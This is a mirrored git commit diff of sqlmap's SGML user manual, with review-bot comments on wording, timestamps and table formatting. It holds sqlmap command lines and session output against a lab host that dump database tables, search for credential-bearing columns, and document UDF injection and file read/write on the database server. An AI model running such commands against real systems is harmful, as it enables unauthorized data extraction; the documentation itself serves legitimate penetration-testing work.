mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-26 03:23:48 +03:00
update
This commit is contained in:
parent
ef7666c12b
commit
63880e3121
207
doc/README.sgml
|
@ -325,7 +325,7 @@ custom application credentials.
|
||||||
|
|
||||||
<item>Support to <bf>run custom SQL statement(s)</bf> as in an interactive
|
<item>Support to <bf>run custom SQL statement(s)</bf> as in an interactive
|
||||||
SQL client connecting to the back-end database. sqlmap automatically
|
SQL client connecting to the back-end database. sqlmap automatically
|
||||||
dissects the provided statement, determins which technique to use to
|
dissects the provided statement, determines which technique to use to
|
||||||
inject it and how to pack the SQL payload accordingly.
|
inject it and how to pack the SQL payload accordingly.
|
||||||
</itemize>
|
</itemize>
|
||||||
|
|
||||||
|
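Review bot: the spelling fix ("determins" to "determines") in this itemize entry is correct, but note that the same sentence ("sqlmap automatically dissects the provided statement, determines which technique to use to inject it and how to pack the SQL payload accordingly") is now also copied verbatim into the "Execute your SQL statement" section later in this patch, so any future wording change has to be made in both places; consider keeping the feature-list entry shorter and letting the section carry the full description.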
@ -3338,10 +3338,12 @@ Options: <tt>-</tt><tt>-dump</tt>, <tt>-C</tt>, <tt>-T</tt>, <tt>-D</tt>,
|
||||||
and <tt>-</tt><tt>-last</tt>
|
and <tt>-</tt><tt>-last</tt>
|
||||||
|
|
||||||
<p>
|
<p>
|
||||||
It is possible to dump the entries for a specific database table.
|
It is possible to dump table entries.
|
||||||
This functionality depends on the option <tt>-T</tt> to specify the table
|
This functionality depends on the option <tt>-T</tt> to specify the table
|
||||||
name or the option <tt>-C</tt> to specify the column name and optionally
|
name or on the option <tt>-C</tt> to specify the column name and,
|
||||||
on <tt>-D</tt> to specify the database name.
|
optionally on <tt>-D</tt> to specify the database name.
|
||||||
|
|
||||||
|
<p>
|
||||||
If the table name is specified, but the database name is not, the current
|
If the table name is specified, but the database name is not, the current
|
||||||
database name is used.
|
database name is used.
|
||||||
|
|
||||||
|
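Review bot: the rewrapped sentence "or on the option <tt>-C</tt> to specify the column name and, optionally on <tt>-D</tt> to specify the database name" leaves an unbalanced parenthetical comma; it should read "and, optionally, on <tt>-D</tt> to specify the database name." Also, shortening "dump the entries for a specific database table" to "dump table entries" is fine now that the column-only mode is documented below, but the following sentence still says the feature "depends on the option <tt>-T</tt>", which is no longer strictly true since <tt>-C</tt> alone suffices; "depends on <tt>-T</tt> ... or on <tt>-C</tt> ..." would be clearer as two cases.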
@ -3355,31 +3357,31 @@ $ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" --du
|
||||||
[...]
|
[...]
|
||||||
back-end DBMS: MySQL >= 5.0.0
|
back-end DBMS: MySQL >= 5.0.0
|
||||||
|
|
||||||
[17:51:41] [WARNING] missing database parameter, sqlmap is going to use the current
|
[hh:mm:41] [WARNING] missing database parameter, sqlmap is going to use the current
|
||||||
database to dump table 'users' entries
|
database to dump table 'users' entries
|
||||||
[17:51:41] [INFO] fetching current database
|
[hh:mm:41] [INFO] fetching current database
|
||||||
[17:51:41] [INFO] retrieved: testdb
|
[hh:mm:41] [INFO] retrieved: testdb
|
||||||
[17:51:41] [INFO] fetching columns for table 'users' on database 'testdb'
|
[hh:mm:41] [INFO] fetching columns for table 'users' on database 'testdb'
|
||||||
[17:51:41] [INFO] fetching number of columns for table 'users' on database 'testdb'
|
[hh:mm:41] [INFO] fetching number of columns for table 'users' on database 'testdb'
|
||||||
[17:51:41] [INFO] retrieved: 3
|
[hh:mm:41] [INFO] retrieved: 3
|
||||||
[17:51:41] [INFO] retrieved: id
|
[hh:mm:41] [INFO] retrieved: id
|
||||||
[17:51:41] [INFO] retrieved: name
|
[hh:mm:41] [INFO] retrieved: name
|
||||||
[17:51:41] [INFO] retrieved: surname
|
[hh:mm:41] [INFO] retrieved: surname
|
||||||
[17:51:41] [INFO] fetching entries for table 'users' on database 'testdb'
|
[hh:mm:41] [INFO] fetching entries for table 'users' on database 'testdb'
|
||||||
[17:51:41] [INFO] fetching number of entries for table 'users' on database 'testdb'
|
[hh:mm:41] [INFO] fetching number of entries for table 'users' on database 'testdb'
|
||||||
[17:51:41] [INFO] retrieved: 4
|
[hh:mm:41] [INFO] retrieved: 4
|
||||||
[17:51:41] [INFO] retrieved: 1
|
[hh:mm:41] [INFO] retrieved: 1
|
||||||
[17:51:42] [INFO] retrieved: luther
|
[hh:mm:42] [INFO] retrieved: luther
|
||||||
[17:51:42] [INFO] retrieved: blissett
|
[hh:mm:42] [INFO] retrieved: blissett
|
||||||
[17:51:42] [INFO] retrieved: 2
|
[hh:mm:42] [INFO] retrieved: 2
|
||||||
[17:51:42] [INFO] retrieved: fluffy
|
[hh:mm:42] [INFO] retrieved: fluffy
|
||||||
[17:51:42] [INFO] retrieved: bunny
|
[hh:mm:42] [INFO] retrieved: bunny
|
||||||
[17:51:42] [INFO] retrieved: 3
|
[hh:mm:42] [INFO] retrieved: 3
|
||||||
[17:51:42] [INFO] retrieved: wu
|
[hh:mm:42] [INFO] retrieved: wu
|
||||||
[17:51:42] [INFO] retrieved: ming
|
[hh:mm:42] [INFO] retrieved: ming
|
||||||
[17:51:43] [INFO] retrieved: 4
|
[hh:mm:43] [INFO] retrieved: 4
|
||||||
[17:51:43] [INFO] retrieved:
|
[hh:mm:43] [INFO] retrieved:
|
||||||
[17:51:43] [INFO] retrieved: nameisnull
|
[hh:mm:43] [INFO] retrieved: nameisnull
|
||||||
Database: testdb
|
Database: testdb
|
||||||
Table: users
|
Table: users
|
||||||
[4 entries]
|
[4 entries]
|
||||||
|
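Review bot: the timestamp anonymisation in this block is a half-measure: hours and minutes become "hh:mm" while the seconds ("41", "42", "43") are kept, and the new <tt>-C</tt> example added later in this same patch keeps real timestamps such as "[19:18:08]". Pick one convention for the whole document, either "[hh:mm:ss]" everywhere or real timestamps everywhere, so the examples read consistently.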
@ -3418,6 +3420,84 @@ Table: users
|
||||||
+-------------------+
|
+-------------------+
|
||||||
</verb></tscreen>
|
</verb></tscreen>
|
||||||
|
|
||||||
|
<p>
|
||||||
|
If only the column name is specified, sqlmap will enumerate and ask the
|
||||||
|
user to dump all databases' tables containing user provided column(s).
|
||||||
|
This feature can be useful to identify, for instance, tables containing
|
||||||
|
custom application credentials.
|
||||||
|
|
||||||
|
<p>
|
||||||
|
Example on a <bf>MySQL 5.0.67</bf> target:
|
||||||
|
|
||||||
|
<tscreen><verb>
|
||||||
|
$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" -v 1 --dump \
|
||||||
|
-C "urna"
|
||||||
|
|
||||||
|
[...]
|
||||||
|
back-end DBMS: MySQL >= 5.0.0
|
||||||
|
|
||||||
|
do you want sqlmap to consider provided column(s):
|
||||||
|
[1] as LIKE column names (default)
|
||||||
|
[2] as exact column names
|
||||||
|
> 1
|
||||||
|
[19:18:08] [INFO] fetching databases with tables containing columns like 'urna'
|
||||||
|
[19:18:08] [INFO] fetching number of databases with tables containing columns like
|
||||||
|
'urna'
|
||||||
|
[19:18:08] [INFO] retrieved: 1
|
||||||
|
[19:18:08] [INFO] retrieved: testdb
|
||||||
|
[19:18:10] [INFO] fetching tables containing columns like 'urna' in database 'testdb'
|
||||||
|
[19:18:10] [INFO] fetching number of tables containing columns like 'urna' in
|
||||||
|
database 'testdb'
|
||||||
|
[19:18:10] [INFO] retrieved: 1
|
||||||
|
[19:18:10] [INFO] retrieved: users
|
||||||
|
[19:18:10] [INFO] fetching columns like 'urna' for table 'users' on database 'testdb'
|
||||||
|
[19:18:10] [INFO] fetching number of columns for table 'users' on database 'testdb'
|
||||||
|
[19:18:10] [INFO] retrieved: 1
|
||||||
|
[19:18:10] [INFO] retrieved: surname
|
||||||
|
Columns like 'urna' were found in the following databases:
|
||||||
|
Database: testdb
|
||||||
|
Table: users
|
||||||
|
[1 column]
|
||||||
|
+---------+
|
||||||
|
| Column |
|
||||||
|
+---------+
|
||||||
|
| surname |
|
||||||
|
+---------+
|
||||||
|
|
||||||
|
do you want to dump entries? [Y/n] y
|
||||||
|
which database(s)?
|
||||||
|
[a]ll (default)
|
||||||
|
[testdb]
|
||||||
|
[q]uit
|
||||||
|
>
|
||||||
|
which table(s) of database 'testdb'?
|
||||||
|
[a]ll (default)
|
||||||
|
[users]
|
||||||
|
[s]kip
|
||||||
|
[q]uit
|
||||||
|
>
|
||||||
|
[19:18:23] [INFO] fetching columns 'surname' entries for table 'users' on
|
||||||
|
database 'testdb'
|
||||||
|
[19:18:23] [INFO] fetching number of columns 'surname' entries for table
|
||||||
|
'users' on database 'testdb'
|
||||||
|
[19:18:23] [INFO] retrieved: 4
|
||||||
|
[19:18:23] [INFO] retrieved: blissett
|
||||||
|
[19:18:23] [INFO] retrieved: bunny
|
||||||
|
[19:18:23] [INFO] retrieved: ming
|
||||||
|
[19:18:23] [INFO] retrieved: nameisnull
|
||||||
|
Database: testdb
|
||||||
|
Table: users
|
||||||
|
[4 entries]
|
||||||
|
+------------+
|
||||||
|
| surname |
|
||||||
|
+------------+
|
||||||
|
| blissett |
|
||||||
|
| bunny |
|
||||||
|
| ming |
|
||||||
|
| nameisnull |
|
||||||
|
+------------+
|
||||||
|
</verb></tscreen>
|
||||||
|
|
||||||
<p>
|
<p>
|
||||||
sqlmap also stores for each table the dumped entries in a CSV format file.
|
sqlmap also stores for each table the dumped entries in a CSV format file.
|
||||||
You can see the absolute path where sqlmap stores the dumped tables entries
|
You can see the absolute path where sqlmap stores the dumped tables entries
|
||||||
|
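Review bot: in the new paragraph, "all databases' tables containing user provided column(s)" needs a hyphen ("user-provided"), and the sentence reads more naturally as "sqlmap will enumerate all databases' tables containing the user-provided column(s) and ask the user whether to dump them." In the sample session, the two prompts "which database(s)?" and "which table(s) of database 'testdb'?" are answered with a bare ">" line; since the default is "[a]ll", either show the default being taken (e.g. "> a") or add a short sentence saying that pressing Enter accepts the default, otherwise readers may assume the output was truncated. This example also uses "-v 1" where the other examples in the patch omit the verbosity flag; drop it unless the extra verbosity is needed to show the prompts.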
@ -3448,8 +3528,8 @@ Table: users
|
||||||
172.16.213.131/dump/public/users.csv'
|
172.16.213.131/dump/public/users.csv'
|
||||||
[...]
|
[...]
|
||||||
|
|
||||||
$ cat /software/sqlmap/output/172.16.213.131/dump/public/users.csv
|
$ cat ./output/172.16.213.131/dump/public/users.csv
|
||||||
"id","name","surname"
|
id,name,surname
|
||||||
"1","luther","blissett"
|
"1","luther","blissett"
|
||||||
"2","fluffy","bunny"
|
"2","fluffy","bunny"
|
||||||
"3","wu","ming"
|
"3","wu","ming"
|
||||||
|
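Review bot: the CSV header row is changed from "\"id\",\"name\",\"surname\"" to the unquoted "id,name,surname" while the data rows keep their double quotes; this is inconsistent unless the CSV writer really emits an unquoted header and quoted rows. Confirm this against actual sqlmap output and update either the header or the rows so the sample reflects the real file format. The path change to "./output/..." is an improvement over the machine-specific "/software/sqlmap/output/..." prefix, but the log line above it is cut at the hunk boundary, so check that the path printed by sqlmap in that log line was updated to match.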
@ -3459,13 +3539,13 @@ $ cat /software/sqlmap/output/172.16.213.131/dump/public/users.csv
|
||||||
|
|
||||||
<p>
|
<p>
|
||||||
You can also provide the <tt>-</tt><tt>-start</tt> and/or the <tt>-</tt><tt>-stop</tt>
|
You can also provide the <tt>-</tt><tt>-start</tt> and/or the <tt>-</tt><tt>-stop</tt>
|
||||||
options to limit the dump to a range of entries, while those entries can be further limited
|
options to limit the dump to a range of entries, while those entries can be further
|
||||||
to a range of character positions provided with <tt>-</tt><tt>-first</tt> and/or the
|
limited to a range of character positions provided with <tt>-</tt><tt>-first</tt>
|
||||||
<tt>-</tt><tt>-last</tt> options.
|
and/or the <tt>-</tt><tt>-last</tt> options:
|
||||||
|
|
||||||
<itemize>
|
<itemize>
|
||||||
<item><tt>-</tt><tt>-start</tt> specifies the first entry to enumerate
|
<item><tt>-</tt><tt>-start</tt> specifies the first entry to enumerate.
|
||||||
<item><tt>-</tt><tt>-stop</tt> specifies the last entry to enumerate
|
<item><tt>-</tt><tt>-stop</tt> specifies the last entry to enumerate.
|
||||||
</itemize>
|
</itemize>
|
||||||
|
|
||||||
<p>
|
<p>
|
||||||
|
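Review bot: the sentence now ends with a colon introducing the itemize, but the list only covers <tt>-</tt><tt>-start</tt> and <tt>-</tt><tt>-stop</tt> even though the sentence introduces four options (<tt>-</tt><tt>-start</tt>, <tt>-</tt><tt>-stop</tt>, <tt>-</tt><tt>-first</tt> and <tt>-</tt><tt>-last</tt>). Either add two items for <tt>-</tt><tt>-first</tt> (first character position) and <tt>-</tt><tt>-last</tt> (last character position), or keep the full stop and let the list document only the entry range.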
@ -3478,19 +3558,19 @@ $ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" --du
|
||||||
Database: testdb
|
Database: testdb
|
||||||
Table: users
|
Table: users
|
||||||
[3 entries]
|
[3 entries]
|
||||||
+----+----------------------------------------------+-------------------+
|
+----+--------------------------------------------+-------------------+
|
||||||
| id | name | surname |
|
| id | name | surname |
|
||||||
+----+----------------------------------------------+-------------------+
|
+----+--------------------------------------------+-------------------+
|
||||||
| 2 | fluffy | bunny |
|
| 2 | fluffy | bunny |
|
||||||
| 3 | wu | ming |
|
| 3 | wu | ming |
|
||||||
| 4 | sqlmap/0.8 (http://sqlmap.sourceforge.net) | user agent header |
|
| 4 | sqlmap/0.8 (http://sqlmap.sourceforge.net) | user agent header |
|
||||||
+----+----------------------------------------------+-------------------+
|
+----+--------------------------------------------+-------------------+
|
||||||
</verb></tscreen>
|
</verb></tscreen>
|
||||||
|
|
||||||
<p>
|
<p>
|
||||||
As you can see, sqlmap is very flexible. You can leave it to automatically
|
As you can see, sqlmap is very flexible. You can leave it to automatically
|
||||||
enumerate the whole database table up to a single column of a specific
|
enumerate the whole database table up to a range of characters of a single
|
||||||
table entry.
|
column of a specific table entry.
|
||||||
|
|
||||||
|
|
||||||
<sect2>Dump all databases tables entries
|
<sect2>Dump all databases tables entries
|
||||||
|
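Review bot: the table border rows ("+----+---...---+-------------------+") lose two dashes in the "name" column while the data rows, including the widest one "| 4 | sqlmap/0.8 (http://sqlmap.sourceforge.net) | user agent header |", appear unchanged in the diff; make sure the padding of every data row inside the <verb> block was adjusted too, otherwise the box no longer lines up. The rewritten closing sentence, "enumerate the whole database table up to a range of characters of a single column of a specific table entry", correctly reflects the <tt>-</tt><tt>-first</tt>/<tt>-</tt><tt>-last</tt> options added above, though "from the whole table down to a range of characters" would read more naturally than "up to".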
@ -3509,15 +3589,15 @@ $ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" --du
|
||||||
Database: testdb
|
Database: testdb
|
||||||
Table: users
|
Table: users
|
||||||
[5 entries]
|
[5 entries]
|
||||||
+----+----------------------------------------------+-------------------+
|
+----+--------------------------------------------+-------------------+
|
||||||
| id | name | surname |
|
| id | name | surname |
|
||||||
+----+----------------------------------------------+-------------------+
|
+----+--------------------------------------------+-------------------+
|
||||||
| 1 | luther | blissett |
|
| 1 | luther | blissett |
|
||||||
| 2 | fluffy | bunny |
|
| 2 | fluffy | bunny |
|
||||||
| 3 | wu | ming |
|
| 3 | wu | ming |
|
||||||
| 4 | sqlmap/0.8 (http://sqlmap.sourceforge.net) | user agent header |
|
| 4 | sqlmap/0.8 (http://sqlmap.sourceforge.net) | user agent header |
|
||||||
| 5 | NULL | nameisnull |
|
| 5 | NULL | nameisnull |
|
||||||
+----+----------------------------------------------+-------------------+
|
+----+--------------------------------------------+-------------------+
|
||||||
|
|
||||||
Database: information_schema
|
Database: information_schema
|
||||||
Table: CHARACTER_SETS
|
Table: CHARACTER_SETS
|
||||||
|
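Review bot: same width adjustment as in the previous hunk; the border rows of the "users" table shrink by two characters but no data row shows a corresponding change in the diff, so verify that this table still aligns after the edit. Since this table is the same "users" table shown twice in consecutive sections, consider generating both samples from one run so their widths cannot drift apart again.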
@ -3620,21 +3700,23 @@ considered a system database because some database administrators use it
|
||||||
as a users' database.
|
as a users' database.
|
||||||
|
|
||||||
|
|
||||||
<sect2>Run your own SQL statement
|
<sect2>Execute your SQL statement
|
||||||
|
|
||||||
<p>
|
<p>
|
||||||
Options: <tt>-</tt><tt>-sql-query</tt> and <tt>-</tt><tt>-sql-shell</tt>
|
Options: <tt>-</tt><tt>-sql-query</tt> and <tt>-</tt><tt>-sql-shell</tt>
|
||||||
|
|
||||||
<p>
|
<p>
|
||||||
The SQL query and the SQL shell features makes the user able to run
|
The SQL query and the SQL shell features makes the user able to execute
|
||||||
custom SQL statement on the web application's back-end database management.
|
custom SQL statements on the web application's back-end database
|
||||||
sqlmap recognizes the type of SQL statement provided and automatically
|
management.
|
||||||
chooses which SQL injection technique to use for it to be able to execute it.
|
sqlmap automatically dissects the provided statement, determines which
|
||||||
If it is a <tt>SELECT</tt> statement it will retrieve its output through
|
technique to use to inject it and how to pack the SQL payload accordingly.
|
||||||
the blind SQL injection or UNION query SQL injection technique depending
|
|
||||||
on the user's options. Otherwise it will execute the query through the
|
If it is a <tt>SELECT</tt> statement, sqlmap will retrieve its output
|
||||||
stacked query SQL injection technique if the web application supports
|
through the blind SQL injection or UNION query SQL injection technique
|
||||||
multiple statements on the back-end database management system.
|
depending on the user's options. Otherwise it will execute the query
|
||||||
|
through the stacked query SQL injection technique if the web application
|
||||||
|
supports multiple statements on the back-end database management system.
|
||||||
|
|
||||||
<p>
|
<p>
|
||||||
Examples on a <bf>Microsoft SQL Server 2000 Service Pack 0</bf> target:
|
Examples on a <bf>Microsoft SQL Server 2000 Service Pack 0</bf> target:
|
||||||
|
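Review bot: the subject-verb agreement error in "The SQL query and the SQL shell features makes the user able to execute" survives this rewrite; the plural subject needs "make", and the phrasing is simpler as "The SQL query and SQL shell features let the user execute custom SQL statements on ...". The object of that sentence, "the web application's back-end database management.", is also missing the word "system" (the paragraph itself later says "back-end database management system"). Finally, the heading rename from "Run your own SQL statement" to "Execute your SQL statement" drops the word "own", which carried the point of the section (arbitrary, user-supplied statements); "Execute your own SQL statement" keeps it.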
@ -3989,30 +4071,23 @@ the provided SQL statement in a multiple statement mode.
|
||||||
|
|
||||||
<p>
|
<p>
|
||||||
Beware that some web application technologies do not support stacked
|
Beware that some web application technologies do not support stacked
|
||||||
queries on specific database management systems. For instance, PHP does not
|
queries on specific database management systems. For instance, PHP does
|
||||||
support stacked queries when the back-end DBMS is MySQL, but it does
|
not support stacked queries when the back-end DBMS is MySQL, but it does
|
||||||
support when the back-end DBMS is PostgreSQL.
|
support when the back-end DBMS is PostgreSQL.
|
||||||
|
|
||||||
|
|
||||||
<sect1>User-defined function injection
|
<sect1>User-defined function injection
|
||||||
|
|
||||||
<sect2>Inject custom user-injection functions
|
<sect2>Inject custom user-defined functions (UDF)
|
||||||
|
|
||||||
<p>
|
<p>
|
||||||
Option: <tt>-</tt><tt>-udf-inject</tt>
|
Options: <tt>-</tt><tt>-udf-inject</tt> and <tt>-</tt><tt>-shared-lib</tt>
|
||||||
#TODO
|
|
||||||
|
|
||||||
|
|
||||||
<sect2>Local path of the shared library
|
|
||||||
|
|
||||||
<p>
|
|
||||||
Option: <tt>-</tt><tt>-shared-lib</tt>
|
|
||||||
#TODO
|
#TODO
|
||||||
|
|
||||||
|
|
||||||
<sect1>File system access
|
<sect1>File system access
|
||||||
|
|
||||||
<sect2>Read a file from the back-end DBMS file system
|
<sect2>Read a file from the database server's file system
|
||||||
|
|
||||||
<p>
|
<p>
|
||||||
Option: <tt>-</tt><tt>-read-file</tt>
|
Option: <tt>-</tt><tt>-read-file</tt>
|
||||||
|
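Review bot: merging the <tt>-</tt><tt>-shared-lib</tt> option into the <tt>-</tt><tt>-udf-inject</tt> section removes the heading "Local path of the shared library", which was the only place the document said what <tt>-</tt><tt>-shared-lib</tt> is for; the merged section still consists of nothing but "#TODO". At minimum, keep one sentence in the merged section stating that <tt>-</tt><tt>-shared-lib</tt> takes the local path of the shared library containing the user-defined functions to inject, so the option does not become undocumented by this change. The heading fix from "user-injection functions" to "user-defined functions (UDF)" is correct.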
@ -4135,7 +4210,7 @@ output/172.16.213.131/files/C__example.exe: PE32 executable for MS Windows (GUI)
|
||||||
</verb></tscreen>
|
</verb></tscreen>
|
||||||
|
|
||||||
|
|
||||||
<sect2>Write a local file on the back-end DBMS file system
|
<sect2>Write a local file on the database server's file system
|
||||||
|
|
||||||
<p>
|
<p>
|
||||||
Options: <tt>-</tt><tt>-write-file</tt> and <tt>-</tt><tt>-dest-file</tt>
|
Options: <tt>-</tt><tt>-write-file</tt> and <tt>-</tt><tt>-dest-file</tt>
|
||||||
|
|
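Review bot: the two file-system headings are renamed from "back-end DBMS file system" to "database server's file system", but the rest of the document, including the sample output in this same patch ("back-end DBMS: MySQL >= 5.0.0") and the prose ("back-end database management system"), keeps the "back-end DBMS" terminology. Either apply the new wording consistently or keep "back-end DBMS" in these headings so a reader does not wonder whether "database server" and "back-end DBMS" denote different things.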